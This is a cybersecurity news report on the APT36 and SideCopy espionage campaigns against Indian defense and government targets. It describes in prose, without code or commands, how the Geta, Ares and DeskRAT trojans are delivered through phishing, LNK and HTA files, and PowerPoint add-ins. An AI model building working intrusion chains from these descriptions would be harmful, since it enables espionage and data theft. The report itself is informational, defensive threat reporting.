APT36 and SideCopy Intensify Cyber Espionage with Cross-Platform RAT Campaigns Targeting Indian Entities
In a series of sophisticated cyber espionage operations, the Pakistan-aligned threat groups APT36, also known as Transparent Tribe, and its sub-cluster SideCopy have launched coordinated campaigns targeting Indian defense and government sectors. These campaigns employ advanced remote access trojans (RATs) such as Geta RAT, Ares RAT, and DeskRAT to infiltrate both Windows and Linux systems, aiming to exfiltrate sensitive information and maintain persistent access to compromised networks.
Evolving Tactics and Techniques
The recent activities of APT36 and SideCopy underscore a strategic evolution in their cyber operations. By expanding their reach across multiple platforms and adopting more sophisticated delivery methods, these groups have enhanced their ability to evade detection and sustain long-term access to targeted systems. Aditya K. Sood, Vice President of Security Engineering and AI Strategy at Aryaka, noted, Transparent Tribe and SideCopy are not reinventing espionage – they are refining it. He emphasized their focus on cross-platform capabilities, memory-resident techniques, and innovative delivery vectors to operate stealthily while maintaining strategic objectives.
Phishing as the Primary Vector
Central to these campaigns is the use of phishing emails that contain malicious attachments or embedded links directing recipients to attacker-controlled infrastructure. These emails serve as the initial access point, deploying various payloads such as Windows shortcut (LNK) files, ELF binaries, and PowerPoint Add-In files. Once executed, these payloads initiate multi-stage processes to install the RATs, enabling the attackers to perform system reconnaissance, data collection, command execution, and establish long-term control over the infected machines.
Detailed Attack Chains
One notable attack sequence involves a malicious LNK file that triggers mshta.exe to run an HTML Application (HTA) file hosted on compromised legitimate domains. This HTA file contains JavaScript code designed to decrypt an embedded DLL payload. The DLL processes an embedded data blob to write a decoy PDF to disk, connects to a hard-coded command-and-control (C2) server, and displays the decoy document to the user. Simultaneously, the malware assesses the presence of security products on the system and adjusts its persistence mechanisms accordingly before deploying Geta RAT. This RAT is capable of executing a wide range of commands, including system information collection, process enumeration, credential harvesting, clipboard data manipulation, screenshot capture, file operations, shell command execution, and data extraction from connected USB devices.
In parallel, a Linux-focused campaign utilizes a Go-based binary to deploy a Python-based Ares RAT via a shell script downloaded from an external server. Ares RAT mirrors the functionalities of Geta RAT, allowing attackers to execute various commands, harvest sensitive data, and run Python scripts or commands issued remotely.
Deployment of DeskRAT
Another observed campaign involves the delivery of DeskRAT, a Golang-based malware, through a rogue PowerPoint Add-In file. This file contains an embedded macro that establishes outbound communication with a remote server to fetch and execute the malware. The use of DeskRAT by APT36 was documented by cybersecurity firms Sekoia and QiAnXin XLab in October 2025, highlighting the group’s continuous expansion and refinement of their malware arsenal.
Broader Implications
These campaigns reflect a well-resourced and espionage-focused threat actor deliberately targeting Indian defense, government, and strategic sectors. By employing defense-themed lures, impersonating official documents, and leveraging regionally trusted infrastructure, APT36 and SideCopy have demonstrated their commitment to infiltrating critical organizations. Their activities extend beyond the defense sector to include policy, research, critical infrastructure, and defense-adjacent organizations operating within the same trusted ecosystem.
Conclusion
The deployment of advanced RATs like Geta RAT, Ares RAT, and DeskRAT underscores the evolving toolkit of APT36 and SideCopy, optimized for stealth, persistence, and long-term access. These developments highlight the need for enhanced cybersecurity measures and vigilance among Indian entities to counteract the sophisticated tactics employed by these threat actors.
